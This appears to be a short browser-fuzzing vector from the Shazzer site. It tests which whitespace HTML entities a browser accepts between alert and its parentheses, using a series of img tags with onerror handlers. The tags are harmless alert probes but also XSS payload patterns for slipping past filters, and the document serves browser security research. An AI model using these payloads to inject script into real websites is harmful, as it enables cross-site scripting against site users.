16
16
16
6This vector uses Shazzer's new features to check which entities are allowed between a function call using images. The results are a bit inconsistent yet because I currently wait for page load.
<img src=data: onerror="log$[data1]('html($[data1])')"><img src=data: onerror="alert ('&emsp13;')"><img src=data: onerror="alert ('&emsp14;')"><img src=data: onerror="alert ('&emsp;')"><img src=data: onerror="alert ('&ensp;')"><img src=data: onerror="alert ('&hairsp;')"><img src=data: onerror="alert ('&MediumSpace;')"><img src=data: onerror="alert ('&nbsp;')"><img src=data: onerror="alert
('&NewLine;')"><img src=data: onerror="alert ('&NonBreakingSpace;')"><img src=data: onerror="alert ('&numsp;')"><img src=data: onerror="alert ('&puncsp;')"><img src=data: onerror="alert	('&Tab;')"><img src=data: onerror="alert  ('&ThickSpace;')"><img src=data: onerror="alert ('&ThinSpace;')"><img src=data: onerror="alert ('&thinsp;')"><img src=data: onerror="alert ('&VeryThinSpace;')">